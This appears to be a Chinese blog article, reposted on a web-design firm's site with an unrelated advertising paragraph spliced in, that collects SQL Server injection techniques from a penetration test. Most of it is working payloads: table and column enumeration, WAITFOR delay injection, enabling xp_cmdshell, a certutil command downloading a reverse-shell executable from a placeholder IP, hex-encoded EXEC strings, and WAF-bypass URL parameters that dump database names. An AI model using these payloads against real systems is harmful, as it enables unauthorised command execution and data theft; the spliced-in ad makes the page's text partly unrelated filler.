这篇文章将为大家详细讲解有关如何进行SQL Server 注入的分析，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。

10多年的潍城网站建设经验，针对设计、前端、开发、售后、文案、推广等六对一服务，响应快，48小时及时工作处理。成都营销网站建设的优势是能够根据用户设备显示端的尺寸不同，自动调整潍城建站的显示方式，使网站能够适用不同显示终端，在浏览器中调整网站的宽度，无论在任何一种浏览器上浏览网站，都能展现优雅布局与设计，从而大程度地提升浏览体验。成都创新互联公司从事“潍城网站设计”,“潍城网站推广”以来，每个客户项目都认真落实执行。

在实习的渗透测试项目中，遇到的数据库系统绝大部分是SQL Server。也算是了解和熟悉Mssql 的一个重要过程吧。

获取某数据库的所有表（假设库名为fooDB）

--XType='U':表示所有用户表;

--XType='S':表示所有系统表;

SELECTname FROM fooDB..sysobjects Where xtype='U';

获取某表所有字段名（假设表名为fooTable）

SELECTname FROM SysColumns WHERE id=Object_id('fooTable');

延时注入

SELECT* FROM fooTable WHERE id=1 WAITFOR DELAY '0:0:3';

2、常用内置函数

db_name()-- 当前库名

user-- 当前用户名

suser_name()-- 登陆用户名

3、like查询大小写敏感模式

SELECT* FROM dt WHERE columnname COLLATE Chinese_PRC_CS_AS LIKE 'aa%';　

举例分析Chinese_PRC_CS_AI_WS：

前半部份：指 UNICODE字符集，Chinese_PRC_指针对大陆简体字UNICODE 的排序规则。

_BIN 二进制排序

_CI(CS) 是否区分大小写，CI不区分，CS区分

_AI(AS) 是否区分重音，AI不区分，AS区分

_KI(KS) 是否区分假名类型，KI不区分，KS区分

_WI(WS) 是否区分宽度，WI不区分，WS区分

4、实现limitm,n

查询结果中第7 条到第 9条记录，如 MySQL中的 limit 7,3

selecttop 3 id from tablename

whereid not in (

selecttop 6 id from tablename

)

开启xp_cmdshell存储过程

EXECsp_configure 'show advanced options', 1;

RECONFIGURE;

EXECsp_configure 'xp_cmdshell', 1;

RECONFIGURE;

关闭只需将开启语句的第二个1改成0再执行即可

运行命令

execmaster..xp_cmdshell "whoami";

execmaster..xp_cmdshell "ping 127.0.0.1 -n 5 > nul";

execmaster..xp_cmdshell "certutil -urlcache -split -fhttp://IP/re_shell.exe D:\re_shell.exe";

彻底防御xp_cmdshell方法：修复sql注入漏洞、删除xplog70.dll 组件

and可用：?key=aa'+and+db_name()>1

and不可用：?key='%2buser()^1

convert转换类型：?key=a'%2b(convert(int,@@version))

; dEcLaRe @s vArChAr(8000) sEt

@s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29eXeC(@s)-- -

2、有趣的绕过例子输入单引号时会报错

尝试%23和--+-的注释来判断后端数据库系统类型。语句出错的时候返回200并报错。正确的时候是302。可知为mssql。

服务端对数据进行了拦截和过滤，拒绝处理请求。然而可利用varchar^int 来爆出数据。

?appSysCode='%2buser%5e1--+-

拦截有点厉害。尝试了许多select方式都不行。

?appSysCode=a'%2b(select+'aaa')--+-

?appSysCode=a'%2b(select+1)%5e1--+-

?appSysCode=a'%2b(convert(int,(select+'bbb')))%5e1--+-（这里只有a报错）

?appSysCode=a'%2b(convert(varchar,(select+'bbb')))%5e1--+-（这里直接302）

?appSysCode=a'%2b(convert(int,(select+'bbb')))--+-

?appSysCode=a'%3bSELECT+11--+-

?appSysCode=a'%3bexec+xxxxx--+-

不过还是存在规则缺陷的。

?appSysCode=a'%3bselect+*+from+(select+'aaa'+as+c)+t2+where+c%5e1=0--+-

可爆出任意数据

?appSysCode=a'%3bSELECT+name+FROM+master..sysdatabases+where+name%5e1%3e0+and+name+NOT+IN+('master','model','msdb','tempdb','northwind','pubs')--+-

关于如何进行SQL Server 注入的分析就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。

标题名称：如何进行SQLServer注入的分析
分享网址：http://sczitong.cn/article/psoipo.html